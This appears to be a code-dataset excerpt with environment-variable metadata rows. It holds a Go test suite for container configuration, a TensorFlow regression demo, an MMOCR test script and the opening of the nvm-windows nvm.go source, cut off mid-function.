gomega.Expect(sut.Containers.Validate()).To(gomega.BeNil())
gomega.Expect(selinux.GetEnabled()).To(gomega.BeTrue())
sut.Containers.EnableLabeling = false
gomega.Expect(sut.Containers.Validate()).To(gomega.BeNil())
gomega.Expect(selinux.GetEnabled()).To(gomega.BeFalse())
}
})
})
Describe("ValidateNetworkConfig", func() {
It("should succeed with default config", func() {
// Given
// When
err := sut.Network.Validate()
// Then
gomega.Expect(err).To(gomega.BeNil())
})
})
Describe("readConfigFromFile", func() {
It("should succeed with default config", func() {
// Given
// When
defaultConfig, _ := DefaultConfig()
err := readConfigFromFile("testdata/containers_default.conf", defaultConfig)
OCIRuntimeMap := map[string][]string{
"kata": {
"/usr/bin/kata-runtime",
"/usr/sbin/kata-runtime",
"/usr/local/bin/kata-runtime",
"/usr/local/sbin/kata-runtime",
"/sbin/kata-runtime",
"/bin/kata-runtime",
"/usr/bin/kata-qemu",
"/usr/bin/kata-fc",
},
"runc": {
"/usr/bin/runc",
"/usr/sbin/runc",
"/usr/local/bin/runc",
"/usr/local/sbin/runc",
"/sbin/runc",
"/bin/runc",
"/usr/lib/cri-o-runc/sbin/runc",
},
"crun": {
"/usr/bin/crun",
"/usr/local/bin/crun",
},
}
pluginDirs := []string{
"/usr/libexec/cni",
"/usr/lib/cni",
"/usr/local/lib/cni",
"/opt/cni/bin",
}
envs := []string{
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"TERM=xterm",
}
// Then
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(defaultConfig.Engine.CgroupManager).To(gomega.Equal("systemd"))
gomega.Expect(defaultConfig.Containers.Env).To(gomega.BeEquivalentTo(envs))
gomega.Expect(defaultConfig.Containers.PidsLimit).To(gomega.BeEquivalentTo(2048))
gomega.Expect(defaultConfig.Network.CNIPluginDirs).To(gomega.Equal(pluginDirs))
gomega.Expect(defaultConfig.Engine.NumLocks).To(gomega.BeEquivalentTo(2048))
gomega.Expect(defaultConfig.Engine.OCIRuntimes).To(gomega.Equal(OCIRuntimeMap))
})
It("should succeed with commented out configuration", func() {
// Given
// When
conf := Config{}
err := readConfigFromFile("testdata/containers_comment.conf", &conf)
// Then
gomega.Expect(err).To(gomega.BeNil())
})
It("should fail when file does not exist", func() {
// Given
// When
conf := Config{}
err := readConfigFromFile("/invalid/file", &conf)
// Then
gomega.Expect(err).NotTo(gomega.BeNil())
})
It("should fail when toml decode fails", func() {
// Given
// When
conf := Config{}
err := readConfigFromFile("config.go", &conf)
// Then
gomega.Expect(err).NotTo(gomega.BeNil())
})
})
Describe("NewConfig", func() {
It("should success with default config", func() {
// Given
OCIRuntimeMap := map[string][]string{
"runc": {
"/usr/bin/runc",
"/usr/sbin/runc",
"/usr/local/bin/runc",
"/usr/local/sbin/runc",
"/sbin/runc",
"/bin/runc",
"/usr/lib/cri-o-runc/sbin/runc",
"/run/current-system/sw/bin/runc",
},
"crun": {
"/usr/bin/crun",
"/usr/sbin/crun",
"/usr/local/bin/crun",
"/usr/local/sbin/crun",
"/sbin/crun",
"/bin/crun",
"/run/current-system/sw/bin/crun",
},
}
pluginDirs := []string{
"/usr/libexec/cni",
"/usr/lib/cni",
"/usr/local/lib/cni",
"/opt/cni/bin",
}
envs := []string{
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"TERM=xterm",
}
// When
config, err := NewConfig("")
// Then
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(config.Containers.ApparmorProfile).To(gomega.Equal(apparmor.Profile))
gomega.Expect(config.Containers.PidsLimit).To(gomega.BeEquivalentTo(2048))
gomega.Expect(config.Containers.Env).To(gomega.BeEquivalentTo(envs))
gomega.Expect(config.Network.CNIPluginDirs).To(gomega.Equal(pluginDirs))
gomega.Expect(config.Engine.NumLocks).To(gomega.BeEquivalentTo(2048))
gomega.Expect(config.Engine.OCIRuntimes["runc"]).To(gomega.Equal(OCIRuntimeMap["runc"]))
})
It("should success with valid user file path", func() {
// Given
// When
config, err := NewConfig("testdata/containers_default.conf")
// Then
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(config.Containers.ApparmorProfile).To(gomega.Equal("container-default"))
gomega.Expect(config.Containers.PidsLimit).To(gomega.BeEquivalentTo(2048))
})
It("contents of passed-in file should override others", func() {
// Given we do
oldContainersConf, envSet := os.LookupEnv("CONTAINERS_CONF")
os.Setenv("CONTAINERS_CONF", "containers.conf")
// When
config, err := NewConfig("testdata/containers_override.conf")
// Undo that
if envSet {
os.Setenv("CONTAINERS_CONF", oldContainersConf)
} else {
os.Unsetenv("CONTAINERS_CONF")
}
// Then
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(config).ToNot(gomega.BeNil())
gomega.Expect(config.Containers.ApparmorProfile).To(gomega.Equal("overridden-default"))
})
It("should fail with invalid value", func() {
// Given
// When
config, err := NewConfig("testdata/containers_invalid.conf")
// Then
gomega.Expect(err).ToNot(gomega.BeNil())
gomega.Expect(config).To(gomega.BeNil())
})
It("Test Capabilities call", func() {
// Given
// When
config, err := NewConfig("")
// Then
gomega.Expect(err).To(gomega.BeNil())
var addcaps, dropcaps []string
caps, err := config.Capabilities("0", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
defaultCaps := config.Containers.DefaultCapabilities
sort.Strings(defaultCaps)
gomega.Expect(caps).To(gomega.BeEquivalentTo(defaultCaps))
// Add all caps
addcaps = []string{"all"}
caps, err = config.Capabilities("root", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
gomega.Expect(caps).To(gomega.BeEquivalentTo(capabilities.AllCapabilities()))
// Drop all caps
dropcaps = []string{"all"}
caps, err = config.Capabilities("", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
gomega.Expect(caps).ToNot(gomega.BeEquivalentTo([]string{}))
config.Containers.DefaultCapabilities = []string{
"CAP_AUDIT_WRITE",
"CAP_CHOWN",
"CAP_DAC_OVERRIDE",
"CAP_FOWNER",
}
expectedCaps := []string{
"CAP_AUDIT_WRITE",
"CAP_DAC_OVERRIDE",
"CAP_NET_ADMIN",
"CAP_SYS_ADMIN",
}
// Add all caps
addcaps = []string{"CAP_NET_ADMIN", "CAP_SYS_ADMIN"}
dropcaps = []string{"CAP_FOWNER", "CAP_CHOWN"}
caps, err = config.Capabilities("", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
gomega.Expect(caps).To(gomega.BeEquivalentTo(expectedCaps))
addcaps = []string{"NET_ADMIN", "cap_sys_admin"}
dropcaps = []string{"FOWNER", "chown"}
caps, err = config.Capabilities("", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
gomega.Expect(caps).To(gomega.BeEquivalentTo(expectedCaps))
expectedCaps = []string{"CAP_NET_ADMIN", "CAP_SYS_ADMIN"}
caps, err = config.Capabilities("notroot", addcaps, dropcaps)
gomega.Expect(err).To(gomega.BeNil())
sort.Strings(caps)
gomega.Expect(caps).To(gomega.BeEquivalentTo(expectedCaps))
})
It("should succeed with default pull_policy", func() {
err := sut.Engine.Validate()
gomega.Expect(err).To(gomega.BeNil())
gomega.Expect(sut.Engine.PullPolicy).To(gomega.Equal("missing"))
sut.Engine.PullPolicy = DefaultPullPolicy
err = sut.Engine.Validate()
gomega.Expect(err).To(gomega.BeNil())
})
It("should succeed case-insensitive", func() {
sut.Engine.PullPolicy = "NeVer"
err := sut.Engine.Validate()
gomega.Expect(err).To(gomega.BeNil())
})
It("should fail with invalid pull_policy", func() {
sut.Engine.PullPolicy = "invalidPullPolicy"
err := sut.Engine.Validate()
gomega.Expect(err).ToNot(gomega.BeNil())
})
})
Describe("Service Destinations", func() {
ConfPath := struct {
Value string
IsSet bool
}{}
BeforeEach(func() {
ConfPath.Value, ConfPath.IsSet = os.LookupEnv("CONTAINERS_CONF")
conf, _ := ioutil.TempFile("", "containersconf")
os.Setenv("CONTAINERS_CONF", conf.Name())
})
AfterEach(func() {
os.Remove(os.Getenv("CONTAINERS_CONF"))
if ConfPath.IsSet {
os.Setenv("CONTAINERS_CONF", ConfPath.Value)
} else {
os.Unsetenv("CONTAINERS_CONF")
}
})
It("succeed to set and read", func() {
cfg, err := ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg.Engine.ActiveService = "QA"
cfg.Engine.ServiceDestinations = map[string]Destination{
"QA": {
URI: "https://qa/run/podman/podman.sock",
Identity: "/.ssh/id_rsa",
},
}
err = cfg.Write()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg, err = ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
gomega.Expect(cfg.Engine.ActiveService, "QA")
gomega.Expect(cfg.Engine.ServiceDestinations["QA"].URI,
"https://qa/run/podman/podman.sock")
gomega.Expect(cfg.Engine.ServiceDestinations["QA"].Identity,
"/.ssh/id_rsa")
})
It("succeed ActiveDestinations()", func() {
cfg, err := ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg.Engine.ActiveService = "QA"
cfg.Engine.ServiceDestinations = map[string]Destination{
"QB": {
URI: "https://qb/run/podman/podman.sock",
Identity: "/.ssh/qb_id_rsa",
},
"QA": {
URI: "https://qa/run/podman/podman.sock",
Identity: "/.ssh/id_rsa",
},
}
err = cfg.Write()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg, err = ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
u, i, err := cfg.ActiveDestination()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
gomega.Expect(u).To(gomega.Equal("https://qa/run/podman/podman.sock"))
gomega.Expect(i).To(gomega.Equal("/.ssh/id_rsa"))
})
It("succeed ActiveDestinations() CONTAINER_CONNECTION environment", func() {
cfg, err := ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg.Engine.ActiveService = "QA"
cfg.Engine.ServiceDestinations = map[string]Destination{
"QA": {
URI: "https://qa/run/podman/podman.sock",
Identity: "/.ssh/id_rsa",
},
"QB": {
URI: "https://qb/run/podman/podman.sock",
Identity: "/.ssh/qb_id_rsa",
},
}
err = cfg.Write()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg, err = ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
// Given we do
oldContainerConnection, hostEnvSet := os.LookupEnv("CONTAINER_CONNECTION")
os.Setenv("CONTAINER_CONNECTION", "QB")
u, i, err := cfg.ActiveDestination()
// Undo that
if hostEnvSet {
os.Setenv("CONTAINER_CONNECTION", oldContainerConnection)
} else {
os.Unsetenv("CONTAINER_CONNECTION")
}
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
gomega.Expect(u).To(gomega.Equal("https://qb/run/podman/podman.sock"))
gomega.Expect(i).To(gomega.Equal("/.ssh/qb_id_rsa"))
})
It("succeed ActiveDestinations CONTAINER_HOST ()", func() {
cfg, err := ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg.Engine.ActiveService = "QA"
cfg.Engine.ServiceDestinations = map[string]Destination{
"QB": {
URI: "https://qb/run/podman/podman.sock",
Identity: "/.ssh/qb_id_rsa",
},
"QA": {
URI: "https://qa/run/podman/podman.sock",
Identity: "/.ssh/id_rsa",
},
}
err = cfg.Write()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
cfg, err = ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
// Given we do
oldContainerHost, hostEnvSet := os.LookupEnv("CONTAINER_HOST")
oldContainerSSH, sshEnvSet := os.LookupEnv("CONTAINER_SSHKEY")
os.Setenv("CONTAINER_HOST", "foo.bar")
os.Setenv("CONTAINER_SSHKEY", "/.ssh/newid_rsa")
u, i, err := cfg.ActiveDestination()
// Undo that
if hostEnvSet {
os.Setenv("CONTAINER_HOST", oldContainerHost)
} else {
os.Unsetenv("CONTAINER_HOST")
}
// Undo that
if sshEnvSet {
os.Setenv("CONTAINER_SSHKEY", oldContainerSSH)
} else {
os.Unsetenv("CONTAINER_SSHKEY")
}
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
gomega.Expect(u).To(gomega.Equal("foo.bar"))
gomega.Expect(i).To(gomega.Equal("/.ssh/newid_rsa"))
})
It("fail ActiveDestination() no configuration", func() {
cfg, err := ReadCustomConfig()
gomega.Expect(err).ShouldNot(gomega.HaveOccurred())
_, _, err = cfg.ActiveDestination()
gomega.Expect(err).Should(gomega.HaveOccurred())
})
})
Describe("Reload", func() {
It("test new config from reload", func() {
// Default configuration
defaultTestFile := "testdata/containers_default.conf"
oldEnv, set := os.LookupEnv("CONTAINERS_CONF")
os.Setenv("CONTAINERS_CONF", defaultTestFile)
cfg, err := Default()
gomega.Expect(err).To(gomega.BeNil())
if set {
os.Setenv("CONTAINERS_CONF", oldEnv)
} else {
os.Unsetenv("CONTAINERS_CONF")
}
// Reload from new configuration file
testFile := "testdata/temp.conf"
content := `[containers]
env=["foo=bar"]`
err = ioutil.WriteFile(testFile, []byte(content), os.ModePerm)
defer os.Remove(testFile)
gomega.Expect(err).To(gomega.BeNil())
oldEnv, set = os.LookupEnv("CONTAINERS_CONF")
os.Setenv("CONTAINERS_CONF", testFile)
_, err = Reload()
gomega.Expect(err).To(gomega.BeNil())
newCfg, err := Default()
gomega.Expect(err).To(gomega.BeNil())
if set {
os.Setenv("CONTAINERS_CONF", oldEnv)
} else {
os.Unsetenv("CONTAINERS_CONF")
}
expectOldEnv := []string{"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "TERM=xterm"}
expectNewEnv := []string{"foo=bar"}
gomega.Expect(cfg.Containers.Env).To(gomega.Equal(expectOldEnv))
gomega.Expect(newCfg.Containers.Env).To(gomega.Equal(expectNewEnv))
// Reload change back to default global configuration
_, err = Reload()
gomega.Expect(err).To(gomega.BeNil())
})
})
})
| [
"\"CONTAINERS_CONF\""
]
| []
| [
"CONTAINERS_CONF"
]
| [] | ["CONTAINERS_CONF"] | go | 1 | 0 | |
testpy3/tensorflow1.py | import os
import numpy as np
import tensorflow as tf
# Ignore warn: Your CPU supports instructions that this TensorFlow binary
# was not compiled
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
##构造数据##
x_data = np.random.rand(100).astype(np.float32) # 随机生成100个类型为float32的值
y_data = x_data * 0.1 + 0.3 # 定义方程式y=x_data*A+B
##建立TensorFlow神经计算结构##
weight = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
biases = tf.Variable(tf.zeros([1]))
y = weight * x_data + biases
loss = tf.reduce_mean(tf.square(y - y_data)) # 判断与正确值的差距
optimizer = tf.train.GradientDescentOptimizer(0.5) # 根据差距进行反向传播修正参数
train = optimizer.minimize(loss) # 建立训练器
# init=tf.initialize_all_variables() #初始化TensorFlow训练结构
init = tf.global_variables_initializer() # 初始化TensorFlow训练结构
sess = tf.Session() # 建立TensorFlow训练会话
sess.run(init) # 将训练结构装载到会话中
for step in range(400): # 循环训练400次
sess.run(train) # 使用训练器根据训练结构进行训练
if step % 20 == 0: # 每20次打印一次训练结果
print(step, sess.run(weight), sess.run(biases)) # 训练次数,A值,B值
| []
| []
| [
"TF_CPP_MIN_LOG_LEVEL"
]
| [] | ["TF_CPP_MIN_LOG_LEVEL"] | python | 1 | 0 | |
tools/kie_test_imgs.py | #!/usr/bin/env python
import argparse
import os
import os.path as osp
import json
import mmcv
import torch
import numpy as np
from mmcv import Config
from mmcv.image import tensor2imgs
from mmcv.parallel import MMDataParallel
from mmcv.runner import load_checkpoint
from mmocr.models.textdet.detectors.text_detector_mixin import TextDetectorMixin as tdm
from mmocr.datasets import build_dataloader, build_dataset
from mmocr.models import build_detector
def test(model, data_loader, show=False, out_dir=None):
model.eval()
results = []
dataset = data_loader.dataset
prog_bar = mmcv.ProgressBar(len(dataset))
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
batch_size = len(result)
if show or out_dir:
img_tensor = data['img'].data[0]
img_metas = data['img_metas'].data[0]
imgs = tensor2imgs(img_tensor, **img_metas[0]['img_norm_cfg'])
assert len(imgs) == len(img_metas)
gt_bboxes = [data['gt_bboxes'].data[0][0].numpy().tolist()]
for i, (img, img_meta) in enumerate(zip(imgs, img_metas)):
h, w, _ = img_meta['img_shape']
img_show = img[:h, :w, :]
if out_dir:
out_file = osp.join(out_dir, img_meta['ori_filename'])
else:
out_file = None
model.module.show_result(
img_show,
result[i],
gt_bboxes[i],
show=show,
out_file=out_file)
for _ in range(batch_size):
prog_bar.update()
#final_result=tdm.get_boundary(result)
#print(final_result)
return result
def parse_args():
parser = argparse.ArgumentParser(
description='MMOCR visualize for kie model.')
parser.add_argument('config', help='Test config file path.')
parser.add_argument('checkpoint', help='Checkpoint file.')
parser.add_argument('--show', action='store_true', help='Show results.')
parser.add_argument(
'--show-dir', help='Directory where the output images will be saved.')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
return args
def main():
args = parse_args()
assert args.show or args.show_dir, ('Please specify at least one '
'operation (show the results / save )'
'the results with the argument '
'"--show" or "--show-dir".')
cfg = Config.fromfile(args.config)
# import modules from string list.
if cfg.get('custom_imports', None):
from mmcv.utils import import_modules_from_strings
import_modules_from_strings(**cfg['custom_imports'])
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# cfg.model.pretrained = None
distributed = False
# build the dataloader
dataset = build_dataset(cfg.data.test)
data_loader = build_dataloader(
dataset,
samples_per_gpu=1,
workers_per_gpu=cfg.data.workers_per_gpu,
dist=distributed,
shuffle=False)
# build the model and load checkpoint
cfg.model.train_cfg = None
model = build_detector(cfg.model, test_cfg=cfg.get('test_cfg'))
load_checkpoint(model, args.checkpoint, map_location='cpu')
model = MMDataParallel(model, device_ids=[0])
test(model, data_loader, args.show, args.show_dir)
if __name__ == '__main__':
main()
| []
| []
| [
"LOCAL_RANK"
]
| [] | ["LOCAL_RANK"] | python | 1 | 0 | |
src/nvm.go | package main
import (
"bytes"
"fmt"
"io/ioutil"
"log"
"os"
"os/exec"
"path/filepath"
"regexp"
"strconv"
"strings"
"syscall"
"time"
"./nvm/web"
"./nvm/arch"
"./nvm/file"
"./nvm/node"
"github.com/olekukonko/tablewriter"
)
const (
NvmVersion = "1.1.8"
)
type Environment struct {
settings string
root string
symlink string
arch string
node_mirror string
npm_mirror string
proxy string
originalpath string
originalversion string
verifyssl bool
}
var home = filepath.Clean(os.Getenv("NVM_HOME")+"\\settings.txt")
var symlink = filepath.Clean(os.Getenv("NVM_SYMLINK"))
var env = &Environment{
settings: home,
root: "",
symlink: symlink,
arch: os.Getenv("PROCESSOR_ARCHITECTURE"),
node_mirror: "",
npm_mirror: "",
proxy: "none",
originalpath: "",
originalversion: "",
verifyssl: true,
}
func main() {
args := os.Args
detail := ""
procarch := arch.Validate(env.arch)
setup()
// Capture any additional arguments
if len(args) > 2 {
detail = args[2]
}
if len(args) > 3 {
if (args[3] == "32" || args[3] == "64") {
procarch = args[3]
}
}
if len(args) < 2 {
help()
return
}
// Run the appropriate method
switch args[1] {
case "install": install(detail,procarch)
case "uninstall": uninstall(detail)
case "use": use(detail,procarch)
case "list": list(detail)
case "ls": list(detail)
case "on": enable()
case "off": disable()
case "root":
if len(args) == 3 {
updateRootDir(args[2])
} else {
fmt.Println("\nCurrent Root: "+env.root)
}
case "version":
fmt.Println(NvmVersion)
case "v":
fmt.Println(NvmVersion)
case "arch":
if strings.Trim(detail," \r\n") != "" {
detail = strings.Trim(detail," \r\n")
if detail != "32" && detail != "64" {
fmt.Println("\""+detail+"\" is an invalid architecture. Use 32 or 64.")
return
}
env.arch = detail
saveSettings()
fmt.Println("Default architecture set to "+detail+"-bit.")
return
}
_, a := node.GetCurrentVersion()
fmt.Println("System Default: "+env.arch+"-bit.")
fmt.Println("Currently Configured: "+a+"-bit.")
case "proxy":
if detail == "" {
fmt.Println("Current proxy: "+env.proxy)
} else {
env.proxy = detail
saveSettings()
}
//case "update": update()
case "node_mirror": setNodeMirror(detail)
case "npm_mirror": setNpmMirror(detail)
default: help()
}
}
// ===============================================================
// BEGIN | CLI functions
// ===============================================================
func setNodeMirror(uri string) {
env.node_mirror = uri
saveSettings()
}
func setNpmMirror(uri string) {
env.npm_mirror = uri
saveSettings()
}
/*
func update() {
cmd := exec.Command("cmd", "/d", "echo", "testing")
var output bytes.Buffer
var _stderr bytes.Buffer
cmd.Stdout = &output
cmd.Stderr = &_stderr
perr := cmd.Run()
if perr != nil {
fmt.Println(fmt.Sprint(perr) + ": " + _stderr.String())
return
}
}
*/
func install(version string, cpuarch string) {
args := os.Args
lastarg := args[len(args) - 1]
if lastarg == "--insecure" {
env.verifyssl = false
}
if version == "" {
fmt.Println("\nInvalid version.")
fmt.Println(" ")
help()
return
}
cpuarch = strings.ToLower(cpuarch)
if cpuarch != "" {
if cpuarch != "32" && cpuarch != "64" && cpuarch != "all" {
fmt.Println("\""+cpuarch+"\" is not a valid CPU architecture. Must be 32 or 64.")
return
}
} else {
cpuarch = env.arch
}
if cpuarch != "all" {
cpuarch = arch.Validate(cpuarch)
}
// If user specifies "latest" version, find out what version is
if version == "latest" {
url := web.GetFullNodeUrl("latest/SHASUMS256.txt");
content := web.GetRemoteTextFile(url)
re := regexp.MustCompile("node-v(.+)+msi")
reg := regexp.MustCompile("node-v|-x.+")
version = reg.ReplaceAllString(re.FindString(content),"")
}
// if the user specifies only the major version number then install the latest
// version of the major version number
if len(version) == 1 {
version = findLatestSubVersion(version)
} else {
version = cleanVersion(version)
}
if checkVersionExceedsLatest(version) {
fmt.Println("Node.js v"+version+" is not yet released or available.")
return
}
if cpuarch == "64" && !web.IsNode64bitAvailable(version) {
fmt.Println("Node.js v"+version+" is only available in 32-bit.")
return
}
// Check to see if the version is already installed
if !node.IsVersionInstalled(env.root,version,cpuarch) {
if !node.IsVersionAvailable(version){
url := web.GetFullNodeUrl("index.json")
fmt.Println("\nVersion "+version+" is not available.\n\nThe complete list of available versions can be found at " + url)
return
}
// Make the output directories
os.Mkdir(filepath.Join(env.root, "v"+version), os.ModeDir)
os.Mkdir(filepath.Join(env.root, "v"+version, "node_modules"), os.ModeDir)
// Warn the user if they're attempting to install without verifying the remote SSL cert
if !env.verifyssl {
fmt.Println("\nWARNING: The remote SSL certificate will not be validated during the download process.\n")
}
// Download node
if (cpuarch == "32" || cpuarch == "all") && !node.IsVersionInstalled(env.root,version,"32") {
success := web.GetNodeJS(env.root,version,"32");
if !success {
os.RemoveAll(filepath.Join(env.root, "v"+version, "node_modules"))
fmt.Println("Could not download node.js v"+version+" 32-bit executable.")
return
}
}
if (cpuarch == "64" || cpuarch == "all") && !node.IsVersionInstalled(env.root,version,"64") {
success := web.GetNodeJS(env.root,version,"64");
if !success {
os.RemoveAll(filepath.Join(env.root, "v"+version, "node_modules"))
fmt.Println("Could not download node.js v"+version+" 64-bit executable.")
return
}
}
if file.Exists(filepath.Join(env.root, "v"+version, "node_modules", "npm")) {
return
}
// If successful, add npm
npmv := getNpmVersion(version)
success := web.GetNpm(env.root, getNpmVersion(version))
if success {
fmt.Printf("Installing npm v"+npmv+"...")
// new temp directory under the nvm root
tempDir := filepath.Join(env.root, "temp")
// Extract npm to the temp directory
err := file.Unzip(filepath.Join(tempDir, "npm-v"+npmv+".zip"), filepath.Join(tempDir, "nvm-npm"))
// Copy the npm and npm.cmd files to the installation directory
tempNpmBin := filepath.Join(tempDir, "nvm-npm", "cli-"+npmv, "bin")
// Support npm < 6.2.0
if file.Exists(tempNpmBin) == false {
tempNpmBin = filepath.Join(tempDir, "nvm-npm", "npm-"+npmv, "bin")
}
if file.Exists(tempNpmBin) == false {
log.Fatal("Failed to extract npm. Could not find " + tempNpmBin)
}
// Standard npm support
os.Rename(filepath.Join(tempNpmBin, "npm"), filepath.Join(env.root, "v"+version, "npm"))
os.Rename(filepath.Join(tempNpmBin, "npm.cmd"),filepath.Join(env.root, "v"+version, "npm.cmd"))
// npx support
if _, err := os.Stat(filepath.Join(tempNpmBin, "npx")); err == nil {
os.Rename(filepath.Join(tempNpmBin, "npx"), filepath.Join(env.root, "v"+version, "npx"))
os.Rename(filepath.Join(tempNpmBin, "npx.cmd"), filepath.Join(env.root, "v"+version, "npx.cmd"))
}
npmSourcePath := filepath.Join(tempDir, "nvm-npm", "npm-"+npmv)
if file.Exists(npmSourcePath) == false {
npmSourcePath = filepath.Join(tempDir, "nvm-npm", "cli-"+npmv)
}
moveNpmErr := os.Rename(npmSourcePath, filepath.Join(env.root, "v"+version, "node_modules", "npm"))
if moveNpmErr != nil {
// sometimes Windows can take some time to enable access to large amounts of files after unzip, use exponential backoff to wait until it is ready
for _, i := range [5]int{1, 2, 4, 8, 16} {
time.Sleep(time.Duration(i)*time.Second)
moveNpmErr = os.Rename(npmSourcePath, filepath.Join(env.root, "v"+version, "node_modules", "npm"))
if moveNpmErr == nil { break }
}
}
if err == nil && moveNpmErr == nil {
// Remove the temp directory
// may consider keep the temp files here
os.RemoveAll(tempDir)
fmt.Println("\n\nInstallation complete. If you want to use this version, type\n\nnvm use "+version)
} else if moveNpmErr != nil {
fmt.Println("Error: Unable to move directory "+npmSourcePath+" to node_modules: "+moveNpmErr.Error())
} else {
fmt.Println("Error: Unable to install NPM: "+err.Error());
}
} else {
fmt.Println("Could not download npm for node v"+version+".")
fmt.Println("Please visit https://github.com/npm/cli/releases/tag/v"+npmv+" to download npm.")
fmt.Println("It should be extracted to "+env.root+"\\v"+version)
}
// Reset the SSL verification
env.verifyssl = true
// If this is ever shipped for Mac, it should use homebrew.
// If this ever ships on Linux, it should be on bintray so it can use yum, apt-get, etc.
return
} else {
fmt.Println("Version "+version+" is already installed.")
return
}
}
func uninstall(version string) {
// Make sure a version is specified
if len(version) == 0 {
fmt.Println("Provide the version you want to uninstall.")
help()
return
}
version = cleanVersion(version)
// Determine if the version exists and skip if it doesn't
if node.IsVersionInstalled(env.root,version,"32") || node.IsVersionInstalled(env.root,version,"64") {
fmt.Printf("Uninstalling node v"+version+"...")
v, _ := node.GetCurrentVersion()
if v == version {
runElevated(fmt.Sprintf(`"%s" cmd /C rmdir "%s"`,
filepath.Join(env.root, "elevate.cmd"),
filepath.Clean(env.symlink)))
}
e := os.RemoveAll(filepath.Join(env.root, "v"+version))
if e != nil {
fmt.Println("Error removing node v"+version)
fmt.Println("Manually remove " + filepath.Join(env.root, "v"+version) + ".")
} else {
fmt.Printf(" done")
}
} else {
fmt.Println("node v"+version+" is not installed. Type \"nvm list\" to see what is installed.")
}
return
}
func findLatestSubVersion(version string) string {
url := web.GetFullNodeUrl("latest-v" + version + ".x" + "/SHASUMS256.txt")
content := web.GetRemoteTextFile(url)
re := regexp.MustCompile("node-v(.+)+msi")
reg := regexp.MustCompile("node-v|-x.+")
latest := reg.ReplaceAllString(re.FindString(content), "")
return latest
}
func use(version string, cpuarch string) {
if version == "32" || version == "64" {
cpuarch = version
v, _ := node.GetCurrentVersion()
version = v
}
cpuarch = arch.Validate(cpuarch)
version = cleanVersion(version)
// Make sure the version is installed. If not, warn.
if !node.IsVersionInstalled(env.root,version,cpuarch) {
fmt.Println("node v"+version+" ("+cpuarch+"-bit) is not installed.")
if cpuarch == "32" {
if node.IsVersionInstalled(env.root,version,"64") {
fmt.Println("\nDid you mean node v"+version+" (64-bit)?\nIf so, type \"nvm use "+version+" 64\" to use it.")
}
}
if cpuarch == "64" {
if node.IsVersionInstalled(env.root,version,"32") {
fmt.Println("\nDid you mean node v"+version+" (32-bit)?\nIf so, type \"nvm use "+version+" 32\" to use it.")
}
}
return
}
// Remove symlink if it already exists
sym, _ := os.Stat(env.symlink)
if sym != nil {
if !runElevated(fmt.Sprintf(`"%s" cmd /C rmdir "%s"`,
filepath.Join(env.root, "elevate.cmd"),
filepath.Clean(env.symlink))) {
return
}
}
// Create new symlink
if !runElevated(fmt.Sprintf(`"%s" cmd /C mklink /D "%s" "%s"`,
filepath.Join(env.root, "elevate.cmd"),
filepath.Clean(env.symlink),
filepath.Join(env.root, "v"+version))) {
return
}
// Use the assigned CPU architecture
cpuarch = arch.Validate(cpuarch)
nodepath := filepath.Join(env.root, "v"+version, "node.exe")
node32path := filepath.Join(env.root, "v"+version, "node32.exe")
node64path := filepath.Join(env.root, "v"+version, "node64.exe")
node32exists := file.Exists(node32path)
node64exists := file.Exists(node64path)
nodeexists := file.Exists(nodepath)
if node32exists && cpuarch == "32" { // user wants 32, but node.exe is 64
if nodeexists {
os.Rename(nodepath, node64path) // node.exe -> node64.exe
}
os.Rename(node32path, nodepath) // node32.exe -> node.exe
}
if node64exists && cpuarch == "64" { // user wants 64, but node.exe is 32
if nodeexists {
os.Rename(nodepath, node32path) // node.exe -> node32.exe
}
os.Rename(node64path, nodepath) // node64.exe -> node.exe
}
fmt.Println("Now using node v"+version+" ("+cpuarch+"-bit)")
}
func useArchitecture(a string) {
if strings.ContainsAny("32",os.Getenv("PROCESSOR_ARCHITECTURE")) {
fmt.Println("This computer only supports 32-bit processing.")
return
}
if a == "32" || a == "64" {
env.arch = a
saveSettings()
fmt.Println("Set to "+a+"-bit mode")
} else {
fmt.Println("Cannot set architecture to "+a+". Must be 32 or 64 are acceptable values.")
}
}
func list(listtype string) {
if listtype == "" {
listtype = "installed"
}
if listtype != "installed" && listtype != "available" {
